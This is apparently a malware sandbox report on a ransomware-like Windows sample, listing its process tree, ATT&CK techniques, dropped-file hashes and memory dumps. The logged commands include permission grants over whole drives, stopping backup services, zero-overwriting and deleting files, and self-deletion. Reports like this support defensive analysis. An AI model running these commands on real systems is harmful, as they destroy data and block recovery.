C:\Windows\SysWOW64\icacls.exe
"icacls" "Z:*" /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:3604

C:\Windows\SysWOW64\icacls.exe
"icacls" "D:*" /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:3612

C:\Windows\SysWOW64\icacls.exe
"icacls" "C:*" /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:3596

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.7.0.34
2⤵
PID:5048

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
2⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
PID:3764

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
2⤵
PID:2676

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.7 -n 3
3⤵
- Runs ping.exe
PID:4060

C:\Windows\SysWOW64\fsutil.exe
fsutil file setZeroData offset=0 length=524288 “%s”
3⤵
PID:2756

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe
2⤵
- Deletes itself
PID:6008

C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
3⤵
PID:2760

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "395958801-8933661151793810850-158212092081090685311883140302228880-203348247"
1⤵
PID:1896

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1164146697-1757351519121954960-1598656531-194259269417710956351476371403917931529"
1⤵
PID:1120

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1872053314-1445472940324293419-21159644872012361511644811687233454261014497176"
1⤵
PID:772

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
1⤵
PID:2252

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop macmnsvc /y
1⤵
PID:2152

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLWriter /y
1⤵
PID:2252

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1997061358-1814872304457674714-448730642926788787392561543676311-1022516745"
1⤵
PID:2336

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-11808829151551623970477387295749141643-152999599157424081418553353751668623076"
1⤵
PID:2580

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1806817180-324525989-1350126046-42631602711286792791551640673-355785847-591603542"
1⤵
PID:2712

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1349524300-264491354-422650865-170000379-12372704311559823258693977574273300569"
1⤵
PID:2352

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2284102851750714218-17956263341356059538-68260397-1688964880437469013-1505944464"
1⤵
PID:2648

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-367323984289478961-400712025-5575469-1897964322-1857134293-1298701124-1890941733"
1⤵
PID:2680

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1101567333-772160772-62232171180505311-1027584156-493040275-8296030121660249177"
1⤵
PID:564

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-137596843016207695801466659247-788240315-1946335369-172572203719260333741454974235"
1⤵
PID:2172

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "901099379-1722020870805074732-851632885-1456233066-674386539-1419802802-1527311146"
1⤵
PID:2924

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "189307140238978187249660684893735857661344639-1720596160-2053468275-857941555"
1⤵
PID:2400

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-844076941-1092393732-1850109459-17565218082059912405-815250841-1429742881-713413756"
1⤵
PID:2068

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-68735326-5056036131313275624-2291945142893465241538636704-467938199613081133"
1⤵
PID:2964

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "683111131349876665-339622279-2105309224149161751542262906-987451766894225895"
1⤵
PID:1612

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "880083956-160111875-19419675551522892634-4900239171820484090-8918060321846682791"
1⤵
PID:2428

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1409441447-166358734011141505841170503562-53167424812792674551949113955417370641"
1⤵
PID:1796

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-11503997201525866783-2636398131806831343596679775-19656487391909011136-770565243"
1⤵
PID:2948

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1750091196-1541920400-2012754478-321385066-875635047-322969583-18022786051186940972"
1⤵
PID:2588

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "893441057-1530893456-352293957-1559822984-419533987-457585707769182777-1306135271"
1⤵
PID:2304

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1856244861-16479583311265349185-11306903041158274405-1576223994-3688727521460863706"
1⤵
PID:2200

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "244172938-1898520942810559031145472652-12320168231070488151-770320977-1578820010"
1⤵
PID:2600

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1518877750-1753057878-2920150211223463562-1176132614-4931925167650328561741883803"
1⤵
PID:1676

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-56209806-99784166420517067981251393499782245764148889861711332975201400665353"
1⤵
PID:2164

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Winlogon Helper DLL

1

T1004

Privilege Escalation

Defense Evasion

File Permissions Modification

1

T1222

Modify Registry

4

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Remote System Discovery

2

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
58KB

MD5
6045baccf49e1eba0e674945311a06e6

SHA1
379c6234849eecede26fad192c2ee59e0f0221cb

SHA256
65830a65cb913bee83258e4ac3e140faf131e7eb084d39f7020c7acc825b0a58

SHA512
da32af6a730884e73956e4eb6bff61a1326b3ef8ba0a213b5b4aad6de4fbd471b3550b6ac2110f1d0b2091e33c70d44e498f897376f8e1998b1d2afac789abeb

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
342B

MD5
06fcadd4009c49c3d024e7c3ff9ab157

SHA1
3540d151afcad25a99889ce1e4bf96c974ec8d61

SHA256
5c4fa483a4aabfb34e53df4d44f76a9357e9da74394d0bb6f2cc692e929daea7

SHA512
902eb5d61b0b06d2e5ac6fc946fb389e75c802f8b6128eb14b59b217d9af7fe4f55784141ee27a1fa37418f8f12c775e1141abf7401b4220e4fbd8fc9dc18bb9

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
Filesize
2KB

MD5
063a2b596f25a80d12bc29c8809d01db

SHA1
3c953fbcf110a6d0d8e5bf85b836906a43d500d4

SHA256
96e37cb15d0e47409c388c549336051976f082e29149f8503ace4be3069728ad

SHA512
1edd687b2dc4886ff9a060bbea692204244efc6405c3a07b5fa5500afafb74a08879f6f7648c26cc5528adfe0eb5830a4badcb931a8a173c60f5e80b4f74d550

Download Submit
C:\Users\Admin\AppData\Local\Temp\jrwtlxau.exe
Filesize
815KB

MD5
c590a84b8c72cf18f35ae166f815c9df

SHA1
b97761358338e640a31eef5e5c5773b633890914

SHA256
57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4

SHA512
dc657393b96477d6dd51ec87a5adce53d6897ad9cd40c2a4e324284fb71c7b858e4e83ff61ae9c0e60e8c333875481dfb08f73a7121e36e997bac4da54250018

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
5KB

MD5
a41b4f125c422116c63994583cb8d3db

SHA1
4df39e689197f328fed0b49c8c55d36e11aa8076

SHA256
07267f566df694c5e4e15054a5c4d332f679b52bf9fccaf30c5aa7de1af708e8

SHA512
894b1c4b6c12dbde098496ed0b3180975860c354c188e0a42a2c8f985efd12b2e163bbc2188d13edc01c40502845773167e15ba92ee6abd2219aceea1c84a859

Download Submit
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
Filesize
4KB

MD5
821740b3797047b94157666cc0f3455b

SHA1
50badabfff08e6c51c89f528a5ffa2123356e901

SHA256
f19472eb84d7a81e50f907127c9f18cdc0a1c5ddfe974513d98837f8ae2a5578

SHA512
4d03c538a64a8ea34cdc99fab14584e43c9d237dbc06682d2be5c0b9a5b9a0f9d2c2e9e86131589d1d767536c2b65d02c992290cb4d7cccbe2e8cd68e54a547d

Download Submit
memory/108-100-0x0000000000000000-mapping.dmp

Download
memory/268-91-0x0000000000000000-mapping.dmp

Download
memory/564-102-0x0000000000000000-mapping.dmp

Download
memory/564-97-0x0000000000000000-mapping.dmp

Download
memory/572-69-0x0000000000000000-mapping.dmp

Download
memory/572-79-0x0000000076281000-0x0000000076283000-memory.dmp

Filesize
8KB

Download
memory/660-106-0x0000000000000000-mapping.dmp

Download
memory/660-70-0x0000000000000000-mapping.dmp

Download
memory/688-78-0x0000000000000000-mapping.dmp

Download
memory/772-99-0x0000000000000000-mapping.dmp

Download
memory/804-95-0x0000000000000000-mapping.dmp

Download
memory/864-77-0x0000000000000000-mapping.dmp

Download
memory/932-93-0x0000000000000000-mapping.dmp

Download
memory/936-90-0x0000000000000000-mapping.dmp

Download
memory/980-89-0x0000000000000000-mapping.dmp

Download
memory/1056-94-0x0000000000000000-mapping.dmp

Download
memory/1068-62-0x0000000000000000-mapping.dmp

Download
memory/1084-92-0x0000000000000000-mapping.dmp

Download
memory/1120-83-0x0000000000000000-mapping.dmp

Download
memory/1172-67-0x0000000000000000-mapping.dmp

Download
memory/1208-87-0x0000000000000000-mapping.dmp

Download
memory/1364-86-0x0000000000000000-mapping.dmp

Download
memory/1368-82-0x0000000000000000-mapping.dmp

Download
memory/1372-107-0x0000000000000000-mapping.dmp

Download
memory/1388-81-0x0000000000000000-mapping.dmp

Download
memory/1512-68-0x0000000000000000-mapping.dmp

Download
memory/1516-65-0x0000000000000000-mapping.dmp

Download
memory/1592-96-0x0000000000000000-mapping.dmp

Download
memory/1612-103-0x0000000000000000-mapping.dmp

Download
memory/1620-74-0x0000000000000000-mapping.dmp

Download
memory/1624-84-0x0000000000000000-mapping.dmp

Download
memory/1684-104-0x0000000000000000-mapping.dmp

Download
memory/1684-66-0x0000000000000000-mapping.dmp

Download
memory/1716-88-0x0000000000000000-mapping.dmp

Download
memory/1760-63-0x0000000000000000-mapping.dmp

Download
memory/1780-101-0x0000000000000000-mapping.dmp

Download
memory/1780-72-0x0000000000000000-mapping.dmp

Download
memory/1784-76-0x0000000000000000-mapping.dmp

Download
memory/1796-85-0x0000000000000000-mapping.dmp

Download
memory/1808-64-0x0000000000000000-mapping.dmp

Download
memory/1884-98-0x0000000000000000-mapping.dmp

Download
memory/1892-75-0x0000000000000000-mapping.dmp

Download
memory/1896-71-0x0000000000000000-mapping.dmp

Download
memory/1964-105-0x0000000000000000-mapping.dmp

Download
memory/1984-73-0x0000000000000000-mapping.dmp

Download
memory/2020-59-0x0000000000EE0000-0x0000000000EE1000-memory.dmp

Filesize
4KB

Download
memory/2020-61-0x0000000004BC0000-0x0000000004BC1000-memory.dmp

Filesize
4KB

Download
memory/2060-108-0x0000000000000000-mapping.dmp

Download
memory/2064-130-0x0000000004AF0000-0x0000000004AF1000-memory.dmp

Filesize
4KB

Download
memory/2064-129-0x0000000002330000-0x0000000002331000-memory.dmp

Filesize
4KB

Download
memory/2064-147-0x00000000056F0000-0x00000000056F1000-memory.dmp

Filesize
4KB

Download
memory/2064-133-0x00000000025A0000-0x00000000025A1000-memory.dmp

Filesize
4KB

Download
memory/2064-132-0x0000000004AB2000-0x0000000004AB3000-memory.dmp

Filesize
4KB

Download
memory/2064-131-0x0000000004AB0000-0x0000000004AB1000-memory.dmp

Filesize
4KB

Download
memory/2064-152-0x0000000005770000-0x0000000005771000-memory.dmp

Filesize
4KB

Download
memory/2064-153-0x0000000006160000-0x0000000006161000-memory.dmp

Filesize
4KB

Download
memory/2064-154-0x000000007EF30000-0x000000007EF31000-memory.dmp

Filesize
4KB

Download
memory/2064-177-0x0000000006390000-0x0000000006391000-memory.dmp

Filesize
4KB

Download
memory/2064-176-0x0000000006380000-0x0000000006381000-memory.dmp

Filesize
4KB

Download
memory/2064-162-0x0000000005650000-0x0000000005651000-memory.dmp

Filesize
4KB

Download
memory/2064-161-0x0000000006280000-0x0000000006281000-memory.dmp

Filesize
4KB

Download
memory/2064-134-0x0000000002810000-0x0000000002811000-memory.dmp

Filesize
4KB

Download
memory/2084-109-0x0000000000000000-mapping.dmp

Download
memory/2096-110-0x0000000000000000-mapping.dmp

Download
memory/2104-112-0x0000000000000000-mapping.dmp

Download
memory/2116-111-0x0000000000000000-mapping.dmp

Download
memory/2132-113-0x0000000000000000-mapping.dmp

Download
memory/2144-114-0x0000000000000000-mapping.dmp

Download
memory/2172-115-0x0000000000000000-mapping.dmp

Download
memory/2188-116-0x0000000000000000-mapping.dmp

Download
memory/2212-117-0x0000000000000000-mapping.dmp

Download
memory/2252-118-0x0000000000000000-mapping.dmp

Download
memory/2268-120-0x0000000000000000-mapping.dmp

Download
memory/2280-123-0x0000000000000000-mapping.dmp

Download
memory/2288-119-0x0000000000000000-mapping.dmp

Download
memory/2312-121-0x0000000000000000-mapping.dmp

Download
memory/2320-122-0x0000000000000000-mapping.dmp

Download
memory/2336-124-0x0000000000000000-mapping.dmp

Download
memory/2356-125-0x0000000000000000-mapping.dmp

Download
memory/2376-126-0x0000000000000000-mapping.dmp

Download
memory/2400-127-0x0000000000000000-mapping.dmp

Download
memory/3580-140-0x0000000004852000-0x0000000004853000-memory.dmp

Filesize
4KB

Download
memory/3580-139-0x0000000004850000-0x0000000004851000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads